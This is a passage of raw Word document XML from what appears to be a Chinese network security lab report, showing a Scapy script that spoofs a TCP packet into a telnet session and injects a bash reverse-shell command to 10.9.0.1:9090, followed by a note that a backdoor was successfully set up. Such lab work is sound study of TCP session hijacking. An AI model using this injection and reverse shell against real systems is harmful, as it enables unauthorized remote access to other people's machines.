        <w:t>tcp = TCP(sport=50228, dport=23, flags="A", seq=3235185197, ack=1000501204)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18249122" w14:textId="77777777" w:rsidR="00AF3926" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>data = "\r /bin/bash -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1 \r"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE079E0" w14:textId="77777777" w:rsidR="00AF3926" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>pkt = ip/tcp/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B06CE1" w14:textId="77777777" w:rsidR="00AF3926" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD95A14" w14:textId="69C5619C" w:rsidR="00443A34" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>send(pkt,verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177B36C9" w14:textId="6CF17896" w:rsidR="00AF3926" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06ABFBD8" w14:textId="67B1190F" w:rsidR="00AF3926" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101B4C0A" w14:textId="33D95796" w:rsidR="00AF3926" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3401E42B" wp14:editId="0EB68C1E">
            <wp:extent cx="5274310" cy="16205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BD92" w14:textId="0C2A01A4" w:rsidR="00AF3926" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B4B48B2" wp14:editId="5FD1F827">
            <wp:extent cx="5274310" cy="15081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A088" w14:textId="4624D242" w:rsidR="00AF3926" w:rsidRPr="004A152D" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功设置后门</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AF3926" w:rsidRPr="004A15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E21"/>
    <w:rsid w:val="00023C30"/>
    <w:rsid w:val="00337699"/>
    <w:rsid w:val="003646FD"/>
    <w:rsid w:val="00396292"/>
    <w:rsid w:val="00443A34"/>
    <w:rsid w:val="004A152D"/>
    <w:rsid w:val="005F2DA3"/>
    <w:rsid w:val="0063665E"/>
    <w:rsid w:val="007262EE"/>
    <w:rsid w:val="00746632"/>
    <w:rsid w:val="00776D4A"/>
    <w:rsid w:val="008B74FB"/>
    <w:rsid w:val="00937EA8"/>
    <w:rsid w:val="00994980"/>
    <w:rsid w:val="009E5E21"/>
    <w:rsid w:val="00A57B1D"/>
    <w:rsid w:val="00AF3926"/>
    <w:rsid w:val="00B32E05"/>
    <w:rsid w:val="00C32D2F"/>
    <w:rsid w:val="00C4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6424F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E0C204FC-FE05-4931-951A-EFE14212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6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扶影</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>柳 扶影</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-08T01:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-08T13:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>